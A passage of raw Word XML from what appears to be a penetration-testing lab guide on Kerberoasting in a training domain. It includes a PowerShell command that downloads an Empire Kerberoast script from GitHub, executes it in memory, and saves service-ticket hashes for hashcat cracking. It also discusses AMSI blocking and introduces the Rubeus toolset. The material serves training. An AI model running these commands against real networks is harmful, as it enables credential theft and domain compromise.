          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> request, followed by detailing how the results should be returned. In this case, they are customized for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E07590" w14:textId="01664BB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745C4621">
          <v:shape id="_x0000_i1339" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId36" w:name="DefaultOcxName18" w:shapeid="_x0000_i1339"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This works on the version we have here, but if you are on a Windows 10 machine, then Windows Defender might be on. Windows 10 has an </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Antimalware Scan Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (AMSI), which makes it more difficult to perform the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0ADAB3" w14:textId="5D235A3D"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2FB65D0">
          <v:shape id="_x0000_i1338" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId37" w:name="DefaultOcxName19" w:shapeid="_x0000_i1338"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Switch to the Windows 2016 machine, and log in to the domain as user </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>LPT\CPENT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> with password </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Pa$$w0rd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This is a normal user and not an admin. Open a normal PowerShell window and paste the command from </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Step 11</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. The output of the command is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0774CBA7" w14:textId="40BC7ED2"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517D9FEC" wp14:editId="50B166AB">
            <wp:extent cx="5400040" cy="2105660"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="182474608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105660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B56D88" w14:textId="6C8A2CC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B6D05E3">
          <v:shape id="_x0000_i1337" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId39" w:name="DefaultOcxName20" w:shapeid="_x0000_i1337"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As the above screenshot shows, we cannot run the command this time. Try from an </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Admin PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to see if you can run it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937C629" w14:textId="053A5382"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0087B78D">
          <v:shape id="_x0000_i1336" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId40" w:name="DefaultOcxName21" w:shapeid="_x0000_i1336"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As you can observe, you cannot run anything in the Admin PowerShell without credentials, so another method is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB9DEE0" w14:textId="2F86B8F0"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19946C7">
          <v:shape id="_x0000_i1335" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId41" w:name="DefaultOcxName22" w:shapeid="_x0000_i1335"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The reality is that anything we get past now might be blocked the next time we try it, but as pen testers, we have to try.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7F1E4" w14:textId="764011E0"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203D4718">
          <v:shape id="_x0000_i1334" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId42" w:name="DefaultOcxName23" w:shapeid="_x0000_i1334"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter the following string into the PowerShell window. Again, if you do not have Internet, use the ps1 script that is located in the Windows Server 2016 machine named </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoast-Bypass.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. The following string weaponizes the script to attempt to bypass the AMSI protection: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>webreq</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/EmpirePr</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>oject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’); $resp=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>webreq.GetResponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(); $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>respstream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>resp.GetResponseStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(); $reader=[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>System.IO.StreamReader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]::new($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>respstream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>); $content=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>reader.ReadToEnd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(); IEX($content); Invoke-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kerberoast</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OutputFormat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashCat|Select-Object</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ExpandProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash | out-file -Encoding ASCII kerb-Hash0.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F7B2B5" w14:textId="1EE5C56E"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9DD1A0A">
          <v:shape id="_x0000_i1333" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId43" w:name="DefaultOcxName24" w:shapeid="_x0000_i1333"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>The bypass will work up to a certain build of Windows machines, but not Windows 10. You can still perform it in Windows Server 2016. It will also work in an Administrator PowerShell. The successful completion of this is shown in the following screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FC5C2" w14:textId="3D6E754D"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623CE5EB" wp14:editId="63C2A630">
            <wp:extent cx="5400040" cy="842010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2059070406"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842010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA294EB" w14:textId="1C1E4DCE"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54D64FA">
          <v:shape id="_x0000_i1332" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId45" w:name="DefaultOcxName25" w:shapeid="_x0000_i1332"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This again is a change for the attack. Therefore, we need another method. Although we have set another tool up for you to use, you can build the tool from scratch since this is good practice as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437D55D" w14:textId="0E37A0E8"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527A749">
          <v:shape id="_x0000_i1331" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId46" w:name="DefaultOcxName26" w:shapeid="_x0000_i1331"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Before we do that, we will first introduce the tool. The tool is </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rubeus</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D010A08" w14:textId="760B5B7F"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2D49548B">
          <v:shape id="_x0000_i1330" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId47" w:name="DefaultOcxName27" w:shapeid="_x0000_i1330"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">“Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Kekeo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MakeMeEnterpriseAdmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization; without their prior work, this project would not exist. Rubeus also uses a C# ASN.1 parsing/encoding library from Thomas </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Pornin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> named </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
